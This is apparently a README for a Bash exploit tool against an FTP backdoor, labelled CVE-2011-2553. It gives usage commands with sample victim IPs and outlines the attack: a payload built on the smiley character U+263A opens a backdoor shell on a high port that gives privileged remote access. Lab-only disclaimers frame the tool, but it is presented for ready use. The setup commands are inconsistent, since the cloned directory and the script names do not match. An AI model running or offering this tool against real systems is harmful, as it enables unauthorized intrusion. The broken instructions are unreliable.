警告:本仓库包含用于受控实验室测试的教学材料。请勿将此处描述的文件或技术用于不属于您或未获得明确授权的系统。目标是学习和加强安全。
针对 FTP 服务中 CVE-2011-2553 漏洞的 Bash 漏洞利用,可实现远程代码执行和权限提升。
bash (v4.0+)netcat (nc)git clone https://github.com/carlosrpastrana/cve-2011-2553.git
cd cve-2011-2553-exploit
chmod +x escalaprivile.sh
基本用法:
./exploit.sh <IP_VICTIMA>
高级用法:
./exploit.sh <IP_VICTIMA> <PUERTO_FTP> <PUERTO_BACKDOOR>
示例:
使用默认值(FTP: 21,后门: 5000)
./exploit.sh 172.17.0.2
指定自定义端口
./exploit.sh 192.168.1.100 21 4444
在 CTF 环境中
./exploit.sh 10.10.10.5 21 1337
侦察:验证依赖项和连通性
利用:向 FTP 服务发送恶意 payload
后门:自动连接到远程 shell
访问:提供对系统的交互式访问
未针对 CVE-2011-2553 应用补丁的 FTP 服务
对特殊字符 ☺ 存在漏洞的特定 FTP 实现
该漏洞利用使用 Unicode 字符 \u263A (☺) 来触发漏洞
后门通常在高端口上打开(默认 5000)
要求 FTP 服务以高权限运行
仅限教育用途和在受控环境中使用。在未经明确授权的系统上使用此漏洞利用是非法的,构成犯罪行为。(如果需要,我会重复两遍)
作者不对该工具的滥用负责。请仅在测试环境、CTF 实验室或获得明确许可的自有系统中使用。
本项目采用 MIT 许可证 - 有关详细信息,请参阅 LICENSE 文件。